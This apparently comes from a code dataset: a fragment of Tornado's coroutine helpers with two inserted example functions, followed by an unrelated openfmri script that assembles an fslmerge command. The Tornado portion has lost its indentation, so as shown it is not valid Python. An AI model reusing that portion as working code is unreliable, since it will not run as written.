Arguments = collections.namedtuple('Arguments', ['args', 'kwargs'])
def _argument_adapter(callback):
"""Returns a function that when invoked runs ``callback`` with one arg.
If the function returned by this function is called with exactly
one argument, that argument is passed to ``callback``. Otherwise
the args tuple and kwargs dict are wrapped in an `Arguments` object.
"""
def wrapper(*args, **kwargs):
if kwargs or len(args) > 1:
callback(Arguments(args, kwargs))
elif args:
callback(args[0])
else:
callback(None)
return wrapper
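# Hedged illustration (not part of the original module): zero, one, and many
# arguments as seen through the adapter.
def _example_argument_adapter():
    seen = []
    adapted = _argument_adapter(seen.append)
    adapted()             # appends None
    adapted(1)            # appends 1
    adapted(1, 2, k=3)    # appends Arguments(args=(1, 2), kwargs={'k': 3})
    return seen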
if sys.version_info >= (3, 3):
exec(textwrap.dedent("""
@coroutine
def _wrap_awaitable(x):
return (yield from x)
"""))
else:
def _wrap_awaitable(x):
raise NotImplementedError()
def convert_yielded(yielded):
"""Convert a yielded object into a `.Future`.
The default implementation accepts lists, dictionaries, and Futures.
If the `~functools.singledispatch` library is available, this function
may be extended to support additional types. For example::
@convert_yielded.register(asyncio.Future)
def _(asyncio_future):
return tornado.platform.asyncio.to_tornado_future(asyncio_future)
.. versionadded:: 4.1
"""
# Lists and dicts containing YieldPoints were handled separately
# via Multi().
if isinstance(yielded, (list, dict)):
return multi_future(yielded)
elif is_future(yielded):
return yielded
elif isawaitable(yielded):
return _wrap_awaitable(yielded)
else:
raise BadYieldError("yielded unknown object %r" % (yielded,))
if singledispatch is not None:
convert_yielded = singledispatch(convert_yielded)
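# Hedged illustration (not part of the original module): bare Futures pass
# through convert_yielded unchanged, while lists are combined via multi_future.
def _example_convert_yielded():
    f = Future()
    f.set_result('done')
    assert convert_yielded(f) is f
    return convert_yielded([f])  # a Future resolving to ['done']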
| apache-2.0 |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make a list of all contrasts/tasks
"""
import os
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
print cmd
| bsd-2-clause |